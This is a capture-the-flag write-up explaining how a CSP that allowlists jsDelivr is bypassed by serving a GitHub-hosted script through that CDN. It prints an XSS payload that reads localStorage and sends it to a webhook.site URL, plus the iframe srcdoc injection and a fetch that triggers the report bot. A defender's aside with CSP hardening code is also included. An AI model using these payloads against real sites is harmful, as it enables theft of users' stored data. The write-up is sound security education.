cdn

Posted on Apr 12, 2024

This challenge was available at http://6b.vc:9007. Its source was available: cdn.tar.gz

It is very similar to babyXSS. The XSS vulnerability is the same, but the index route now adds a header:

import time
from flask import Flask, Response, render_template

app = Flask(__name__)

@app.route('/')
def index():
    nonce = int(time.time())  # rendered into the template, but never referenced by the CSP below
    response = Response(render_template('index.html', nonce=nonce))
    # Only default-src is set, so it also governs scripts: 'self' plus anything served from cdn.jsdelivr.net
    response.headers['Content-Security-Policy'] = f"default-src cdn.jsdelivr.net 'self'"
    return response

There is a Content-Security-Policy header, which does not allow us to execute inline scripts or use eval. Because only default-src is set, it governs scripts as well: they may be loaded only from the page's own origin ('self') or from cdn.jsdelivr.net.
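A defender's aside, added here and not part of the original writeup: the route computes a nonce but never puts it in the header, so the whole policy rests on an allowlisted public CDN. The Python below (my own example, not the challenge's code; `script_allowed` is a hypothetical, simplified evaluator, not a full CSP3 implementation) compares the challenge's header with a nonce-based one that the template's existing `nonce` variable could feed.

```python
import secrets
from typing import Optional
from urllib.parse import urlsplit

# The challenge's header, copied from the route above.
CHALLENGE_CSP = "default-src cdn.jsdelivr.net 'self'"

def make_nonce() -> str:
    """A per-request nonce has to be unpredictable; int(time.time()) is not."""
    return secrets.token_urlsafe(16)

def hardened_csp(nonce: str) -> str:
    # Allowlisting a public CDN lets anyone who can publish there run code on the
    # page. A nonce admits only the <script nonce="..."> tags the template emits.
    return f"default-src 'self'; script-src 'nonce-{nonce}'"

def parse_csp(header: str) -> dict:
    directives = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives

def script_allowed(header: str, page_url: str, src: Optional[str] = None,
                   nonce_attr: Optional[str] = None) -> bool:
    """Simplified check of whether a <script> may run (hypothetical helper,
    not a full CSP3 evaluator). src=None means an inline script."""
    directives = parse_csp(header)
    sources = directives.get("script-src", directives.get("default-src", []))
    if nonce_attr and f"'nonce-{nonce_attr}'" in sources:
        return True                     # a matching nonce wins regardless of origin
    if src is None:
        return "'unsafe-inline'" in sources
    page, script = urlsplit(page_url), urlsplit(src)
    for s in sources:
        if s == "*":
            return True
        if s == "'self'" and (script.scheme, script.netloc) == (page.scheme, page.netloc):
            return True
        if s.endswith(":") and script.scheme == s[:-1]:
            return True                 # scheme-source such as https:
        if s.startswith("'"):
            continue                    # keywords, nonces and hashes never match a URL
        host = s.split("://")[-1].split("/")[0].split(":")[0].lower()
        if script.hostname == host or (host.startswith("*.") and script.hostname.endswith(host[1:])):
            return True
    return False
```

Under the hardened header a script pulled from the CDN is rejected even though the page's own origin is still allowed for other resource types.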

Fortunately for us, we can publish anything on jsDelivr (see the list of jsDelivr providers).

jsDelivr allows us to load scripts from NPM and GitHub. I chose GitHub for this challenge, because it is the most convenient option. I created a repository and wrote my XSS payload in it:

// Runs inside the srcdoc iframe, which shares the parent page's origin, so this is the target's localStorage
const flag = JSON.stringify({ ...localStorage })

// Navigate the top-level document to the webhook, carrying the base64-encoded flag
window.parent.document.location = `https://webhook.site/40a6771d-b79d-4ea5-bbb3-df68cdcf56b7?flag=${encodeURIComponent(btoa(flag))}`

I also can’t use an img tag for this challenge, because an img tag cannot load a remote script; an iframe with srcdoc can carry the script tag instead:

// An iframe whose srcdoc holds a script tag loading cdn.js from the GitHub repository through jsDelivr
const payload = `<iframe srcdoc="<script src=https://cdn.jsdelivr.net/gh/manaf941/polygl0ts@main/cdn.js></script>"></iframe>`
// Print the challenge URL with the payload in the search parameter
console.log(`http://6b.vc:9006/?search=${encodeURIComponent(payload)}`)

Solution

The following link will make the bot send us the flag.

http://localhost:9006/?search=%3Ciframe%20srcdoc%3D%22%3Cscript%20src%3Dhttps%3A%2F%2Fcdn.jsdelivr.net%2Fgh%2Fmanaf941%2Fpolygl0ts%40main%2Fcdn.js%3E%3C%2Fscript%3E%22%3E%3C%2Fiframe%3E

We can trigger the /report endpoint either with curl or with the following JavaScript code in the browser’s console.

fetch("/report?url="+encodeURIComponent("http://localhost:9006/?search=%3Ciframe%20srcdoc%3D%22%3Cscript%20src%3Dhttps%3A%2F%2Fcdn.jsdelivr.net%2Fgh%2Fmanaf941%2Fpolygl0ts%40main%2Fcdn.js%3E%3C%2Fscript%3E%22%3E%3C%2Fiframe%3E"))

We receive the flag on the webhook:

flag{currently 16:40, meeting in 20 minutes, didnt test the challs yet so I really hope everything goes well}